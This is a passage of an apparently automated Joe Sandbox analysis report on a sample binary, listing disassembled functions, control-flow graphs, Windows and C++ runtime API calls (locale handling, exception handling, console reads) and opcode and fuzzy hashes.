                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: 7dd773c854ee372d671b6f10035b0ea0046fcb1d3704b27a48a68b50b95b1612
                                                                                                  • Instruction ID: 914ead4457ee276f793921c052b37e29c36b6b4bdeb600c7dfff8e8f858a38df
                                                                                                  • Opcode Fuzzy Hash: 7dd773c854ee372d671b6f10035b0ea0046fcb1d3704b27a48a68b50b95b1612
                                                                                                  • Instruction Fuzzy Hash: 9BF0FC362003045FDB246F359891A767B9AFF80358F15452DF9058B6C0D6B19C42D760
                                                                                                  Function 00686AB1 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0067EC95: EnterCriticalSection.KERNEL32(?,?,006858B2,?,0069DC50,00000008,00685A76,?,0067D8B6,?), ref: 0067ECA4
                                                                                                  • EnumSystemLocalesW.KERNEL32(00686AA4,00000001,0069DD10,0000000C,00686E7C,00000000), ref: 00686AE9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1272433827-0
                                                                                                  • Opcode ID: 3e168357e0f3ea6f88ab8c10b4e116b98a98a0ed5aeb9eb2a2feeff8619235e1
                                                                                                  • Instruction ID: c7b6286e19fb921efe6c98028f48ed8ce31b1317be515a23669c0d1f422e205c
                                                                                                  • Opcode Fuzzy Hash: 3e168357e0f3ea6f88ab8c10b4e116b98a98a0ed5aeb9eb2a2feeff8619235e1
                                                                                                  • Instruction Fuzzy Hash: EFF04936A40205DFDB04EF99E902B9C7BF6FB09725F10916AF510EB2A0DB759940CF54
                                                                                                  Function 0068DB10 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • EnumSystemLocalesW.KERNEL32(0068DA69,00000001,?,?,?,0068E2D7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0068DB47
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: 55624e0194b7870bc98fdef069dead67860eb03dba37d111378a768ccd38de96
                                                                                                  • Instruction ID: fe61c67ff2490be607676aa131dad68613006f7e8d09b6dc70892bd2e15d73b9
                                                                                                  • Opcode Fuzzy Hash: 55624e0194b7870bc98fdef069dead67860eb03dba37d111378a768ccd38de96
                                                                                                  • Instruction Fuzzy Hash: 58F0E53630020597CB18AF7AD859AAA7FA6EFC1724F174059EB098B690C675D943C760
                                                                                                  Function 00686F80 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006836E4,?,20001004,00000000,00000002,?,?,00682CD6), ref: 00686FB4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: edb70c866a7ebf153b5653846c82e969f90380c69324e3524c4702db30b7a969
                                                                                                  • Instruction ID: 1da5ba4991f36ca886932c06bd131db3a7e2ccac54d54bf20a033f87dd02b73a
                                                                                                  • Opcode Fuzzy Hash: edb70c866a7ebf153b5653846c82e969f90380c69324e3524c4702db30b7a969
                                                                                                  • Instruction Fuzzy Hash: 9EE01A36504118BBCF123F60EC09EAE7E1BEB54762F054115FD06A62618B31C972AB94
                                                                                                  Function 00678F9D Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00008FA9,006783B3), ref: 00678FA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: 4579956bec7f7cdbd23cf8aed95e037a5026b583f47f29b4726a16c4f2454129
                                                                                                  • Instruction ID: 047dc995863f72d135d4860d54a3faf2f73b967048572880376bf09873ae15f5
                                                                                                  • Opcode Fuzzy Hash: 4579956bec7f7cdbd23cf8aed95e037a5026b583f47f29b4726a16c4f2454129
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  Function 0068E436 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: e95c4bee417f2fc73e9ee16b6469262437f001ad136a60d70d5b2978b6286a39
                                                                                                  • Instruction ID: 3213651de1342405732833a92e9d22d4d179f9d5f139d555edd418499f8795aa
                                                                                                  • Opcode Fuzzy Hash: e95c4bee417f2fc73e9ee16b6469262437f001ad136a60d70d5b2978b6286a39
                                                                                                  • Instruction Fuzzy Hash: E1A012315001008B53005F315905A0837AA5A05291305A0165009C0060DE2450415F00
                                                                                                  Function 0068D31A Relevance: .3, Instructions: 327COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1452528299-0
                                                                                                  • Opcode ID: c6d81d1accb3582012ba4dfed229a5d4cbec22f45bfef3db4a7c20b5d71d3e5f
                                                                                                  • Instruction ID: 41583f1ed5e6d3d6fb505984122058558ae5cfc20c6f688dd20657f730b212ce
                                                                                                  • Opcode Fuzzy Hash: c6d81d1accb3582012ba4dfed229a5d4cbec22f45bfef3db4a7c20b5d71d3e5f
                                                                                                  • Instruction Fuzzy Hash: 5BB1F5355007059BDB34BB24CC92AB7B3EAEF44308F14466EEA47C66C0EA75F9858B21
                                                                                                  Function 00674B70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 190COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 464 674b70-674bc2 call 6761c5 467 674bc4-674bd3 call 6761c5 464->467 468 674bf3-674c00 464->468 477 674be5-674bed call 67621d 467->477 478 674bd5-674be0 467->478 470 674c32 468->470 471 674c02-674c0a 468->471 472 674c34-674c38 470->472 471->472 474 674c0c-674c31 call 67621d call 678287 471->474 475 674c4a-674c4c 472->475 476 674c3a-674c42 call 676512 472->476 475->474 481 674c4e-674c53 475->481 476->481 490 674c44-674c47 476->490 477->468 478->477 486 674c55-674c57 481->486 487 674c59-674c70 call 67829a 481->487 486->474 493 674c72-674c77 487->493 494 674c7e 487->494 490->475 495 674c83-674cc9 call 6761c5 493->495 496 674c79-674c7c 493->496 494->495 499 674ccf-674cfb call 676616 call 676661 495->499 500 674daa-674db4 call 67638c 495->500 496->495 507 674d06-674d12 499->507 508 674cfd-674d03 call 67e8b9 499->508 510 674d14-674d1a call 67e8b9 507->510 511 674d1d-674d29 507->511 508->507 510->511 512 674d34-674d40 511->512 513 674d2b-674d31 call 67e8b9 511->513 517 674d42-674d48 call 67e8b9 512->517 518 674d4b-674d57 512->518 513->512 517->518 522 674d62-674d6e 518->522 523 674d59-674d5f call 67e8b9 518->523 526 674d70-674d76 call 67e8b9 522->526 527 674d79-674da5 call 67621d call 6764e6 522->527 523->522 526->527 527->474
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674BA6
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674BC8
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00674BE8
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00674C0F
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674C88
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00674CD4
                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00674CEE
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00674D83
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00674D90
                                                                                                    • Part of subcall function 0067638C: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00676398
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 1592514138-1405518554
                                                                                                  • Opcode ID: 5af9a4cfadf56f78e18a0e388d1d9e613583926e45105bcfeb65804dc0c472f7
                                                                                                  • Instruction ID: 03a54d98e3713e76fc446f37ab3ce1f6343fc334dfd9c1dfb69bd7a46e6de1f8
                                                                                                  • Opcode Fuzzy Hash: 5af9a4cfadf56f78e18a0e388d1d9e613583926e45105bcfeb65804dc0c472f7
                                                                                                  • Instruction Fuzzy Hash: B96192B1D01204DFEF51DFE8D949BDEBBB6AF08310F148459E809AB341EB35A909CB95
                                                                                                  Function 00675A20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 187COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 536 675a20-675a5c 537 675c67-675c7c 536->537 538 675a62-675a65 536->538 538->537 539 675a6b-675a91 call 67829a 538->539 542 675a93-675a98 539->542 543 675a9f 539->543 544 675aa4-675aea call 6761c5 542->544 545 675a9a-675a9d 542->545 543->544 548 675af0-675b59 call 676616 call 67e891 call 677cef * 2 call 67ca63 544->548 549 675c7d-675c82 call 67638c 544->549 545->544 552 675c87 call 67632f 548->552 568 675b5f-675b75 call 67ca63 548->568 549->552 556 675c8c call 67632f 552->556 560 675c91-675c96 call 67632f 556->560 568->556 571 675b7b-675b9f call 67ca63 568->571 571->560 574 675ba5-675bda call 676661 571->574 577 675be5-675bf1 574->577 578 675bdc-675be2 call 67e8b9 574->578 580 675bf3-675bf9 call 67e8b9 577->580 581 675bfc-675c08 577->581 578->577 580->581 582 675c13-675c1f 581->582 583 675c0a-675c10 call 67e8b9 581->583 588 675c21-675c27 call 67e8b9 582->588 589 675c2a-675c36 582->589 583->582 588->589 592 675c41-675c4d 589->592 593 675c38-675c3e call 67e8b9 589->593 596 675c4f-675c55 call 67e8b9 592->596 597 675c58-675c62 call 67621d 592->597 593->592 596->597 597->537
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00675AA9
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00675AF5
                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00675BCD
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00675C62
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00675C87
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00675C8C
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00675C91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Concurrency::cancel_current_task$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                  • String ID: bad locale name$false$true
                                                                                                  • API String ID: 3559308103-1062449267
                                                                                                  • Opcode ID: 6e4bf975d934a2dac165bd3218595ccb63571db6c3effb35de4b1a26eb6ddc9e
                                                                                                  • Instruction ID: b76453c9d190f22ae781582d20ef328779c3db5c717f96e4cab876671b35e1ac
                                                                                                  • Opcode Fuzzy Hash: 6e4bf975d934a2dac165bd3218595ccb63571db6c3effb35de4b1a26eb6ddc9e
                                                                                                  • Instruction Fuzzy Hash: DB616DB0D00748DFEB50DFA4D94579EBBBAAF04310F14856DE819A7381E7B59A04CBA1
                                                                                                  Function 0067BA88 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 602 67ba88-67bab3 call 67ca00 605 67be27-67be2c call 68128d 602->605 606 67bab9-67babc 602->606 606->605 607 67bac2-67bacb 606->607 609 67bad1-67bad5 607->609 610 67bbc8-67bbce 607->610 609->610 612 67badb-67bae2 609->612 613 67bbd6-67bbe4 610->613 616 67bae4-67baeb 612->616 617 67bafa-67baff 612->617 614 67bd90-67bd93 613->614 615 67bbea-67bbee 613->615 620 67bdb6-67bdbf call 67b70c 614->620 621 67bd95-67bd98 614->621 615->614 618 67bbf4-67bbfb 615->618 616->617 619 67baed-67baf4 616->619 617->610 622 67bb05-67bb0d call 67b70c 617->622 625 67bc13-67bc19 618->625 626 67bbfd-67bc04 618->626 619->610 619->617 620->605 636 67bdc1-67bdc5 620->636 621->605 623 67bd9e-67bdb3 call 67be2d 621->623 635 67bb13-67bb2c call 67b70c * 2 622->635 622->636 623->620 631 67bd30-67bd34 625->631 632 67bc1f-67bc46 call 6790eb 625->632 626->625 630 67bc06-67bc0d 626->630 630->614 630->625 638 67bd36-67bd3f call 67953f 631->638 639 67bd40-67bd4c 631->639 632->631 647 67bc4c-67bc4f 632->647 635->605 661 67bb32-67bb38 635->661 638->639 639->620 640 67bd4e-67bd58 639->640 644 67bd66-67bd68 640->644 645 67bd5a-67bd5c 640->645 650 67bd7f-67bd8c call 67c4a6 644->650 651 67bd6a-67bd7d call 67b70c * 2 644->651 645->620 649 67bd5e-67bd62 645->649 653 67bc52-67bc67 647->653 649->620 654 67bd64 649->654 669 67bd8e 650->669 670 67bdeb-67be00 call 67b70c * 2 650->670 677 67bdc6 call 684008 651->677 657 67bd11-67bd24 653->657 658 67bc6d-67bc70 653->658 654->651 657->653 662 67bd2a-67bd2d 657->662 658->657 663 67bc76-67bc7e 658->663 666 67bb64-67bb6c call 67b70c 661->666 667 67bb3a-67bb3e 661->667 662->631 663->657 668 67bc84-67bc98 663->668 683 67bbd0-67bbd3 666->683 684 67bb6e-67bb8e call 67b70c * 2 call 67c4a6 666->684 667->666 673 67bb40-67bb47 667->673 674 67bc9b-67bcac 668->674 669->620 698 67be05-67be22 call 6792d7 call 67c3a6 call 67c563 call 67c31d 670->698 699 67be02 670->699 678 67bb5b-67bb5e 673->678 679 67bb49-67bb50 673->679 680 67bcd2-67bcdf 674->680 681 67bcae-67bcbf call 67bf63 674->681 694 67bdcb-67bde6 call 67953f call 67c117 call 6796fd 677->694 678->605 678->666 679->678 688 67bb52-67bb59 679->688 680->674 686 67bce1 680->686 695 67bce3-67bd0b call 67ba08 681->695 696 67bcc1-67bcca 681->696 683->613 684->683 716 67bb90-67bb95 684->716 693 67bd0e 686->693 688->666 688->678 693->657 694->670 695->693 696->681 701 67bccc-67bccf 696->701 698->605 699->698 701->680 716->677 718 67bb9b-67bbae call 67c12f 716->718 718->694 723 67bbb4-67bbc0 718->723 723->677 724 67bbc6 723->724 724->718
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0067BBA7
                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0067BCB5
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0067BE07
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0067BE22
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2751267872-393685449
                                                                                                  • Opcode ID: dd6619496aa0c57afa456da28d5711ae03e7df8d64213c2739ce378bdcbd91ae
                                                                                                  • Instruction ID: 36f8c529a147452195dbe7a62a8704c7373d61c829f9bae32fc3a4c7c2bbdfa3
                                                                                                  • Opcode Fuzzy Hash: dd6619496aa0c57afa456da28d5711ae03e7df8d64213c2739ce378bdcbd91ae
                                                                                                  • Instruction Fuzzy Hash: A1B14871800209EFCF29DFA4C881AEEB7B6FF54310F14916AE8196B316D731EA51CB95
                                                                                                  Function 00689778 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 292COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 725 689778-689788 726 68978a-68979d call 680cfb call 680d0e 725->726 727 6897a2-6897a4 725->727 743 689afc 726->743 729 6897aa-6897b0 727->729 730 689ae4-689af1 call 680cfb call 680d0e 727->730 729->730 733 6897b6-6897df 729->733 748 689af7 call 67ebf3 730->748 733->730 736 6897e5-6897ee 733->736 739 689808-68980a 736->739 740 6897f0-689803 call 680cfb call 680d0e 736->740 741 689ae0-689ae2 739->741 742 689810-689814 739->742 740->748 747 689aff-689b02 741->747 742->741 746 68981a-68981e 742->746 743->747 746->740 750 689820-689837 746->750 748->743 753 689839-68983c 750->753 754 68986c-689872 750->754 756 68983e-689844 753->756 757 689862-68986a 753->757 758 689874-68987b 754->758 759 689846-68985d call 680cfb call 680d0e call 67ebf3 754->759 756->757 756->759 763 6898df-6898fe 757->763 760 68987d 758->760 761 68987f-68989d call 684839 call 6847ff * 2 758->761 790 689a17 759->790 760->761 795 6898ba-6898dd call 689d09 761->795 796 68989f-6898b5 call 680d0e call 680cfb 761->796 764 6899ba-6899c3 call 6903c8 763->764 765 689904-689910 763->765 779 689a34 764->779 780 6899c5-6899d7 764->780 765->764 768 689916-689918 765->768 768->764 772 68991e-68993f 768->772 772->764 776 689941-689957 772->776 776->764 781 689959-68995b 776->781 783 689a38-689a4e ReadFile 779->783 780->779 785 6899d9-6899e8 GetConsoleMode 780->785 781->764 786 68995d-689980 781->786 788 689aac-689ab7 GetLastError 783->788 789 689a50-689a56 783->789 785->779 791 6899ea-6899ee 785->791 786->764 794 689982-689998 786->794 797 689ab9-689acb call 680d0e call 680cfb 788->797 798 689ad0-689ad3 788->798 789->788 799 689a58 789->799 793 689a1a-689a24 call 6847ff 790->793 791->783 792 6899f0-689a08 ReadConsoleW 791->792 800 689a29-689a32 792->800 801 689a0a GetLastError 792->801 793->747 794->764 805 68999a-68999c 794->805 795->763 796->790 797->790 802 689ad9-689adb 798->802 803 689a10-689a16 call 680cb4 798->803 809 689a5b-689a6d 799->809 800->809 801->803 802->793 803->790 805->764 812 68999e-6899b5 805->812 809->793 816 689a6f-689a73 809->816 812->764 817 689a8c-689a99 816->817 818 689a75-689a85 call 68948a 816->818 824 689a9b call 6895e1 817->824 825 689aa5-689aaa call 6892d0 817->825 830 689a88-689a8a 818->830 831 689aa0-689aa3 824->831 825->831 830->793 831->830
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3907804496
                                                                                                  • Opcode ID: dc0bc450d2865d62e75bca82ddb03fab743df09fab9fb20145a13afe4f7df0e7
                                                                                                  • Instruction ID: d97d289146c0df76265d10de8abb01cdc240c5ffb664578cf944ce44de370d45
                                                                                                  • Opcode Fuzzy Hash: dc0bc450d2865d62e75bca82ddb03fab743df09fab9fb20145a13afe4f7df0e7
                                                                                                  • Instruction Fuzzy Hash: 12B1F470A04249AFEB15FFA8C880BBE7BB7AF46314F184359E50597392C7B19942CB74
                                                                                                  Function 00675460 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 833 675460-6754b3 call 6761c5 836 6754b5-6754c4 call 6761c5 833->836 837 6754e4-6754f4 833->837 845 6754d6-6754de call 67621d 836->845 846 6754c6-6754d1 836->846 838 6754f6-6754fe 837->838 839 675502-675504 837->839 841 675560-675585 call 67621d call 678287 838->841 842 675500 838->842 843 675507-67550b 839->843 842->843 848 675520-675522 843->848 849 67550d-675515 call 676512 843->849 845->837 846->845 848->841 853 675524-675526 848->853 849->853 861 675517-67551d 849->861 857 67552c-67553e call 675a20 853->857 858 675528-67552a 853->858 863 675586-67558b call 671880 857->863 864 675540-67555a call 6764e6 857->864 858->841 861->848 864->841
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00675496
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 006754B9
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 006754D9
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0067554B
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00675563
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00675586
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
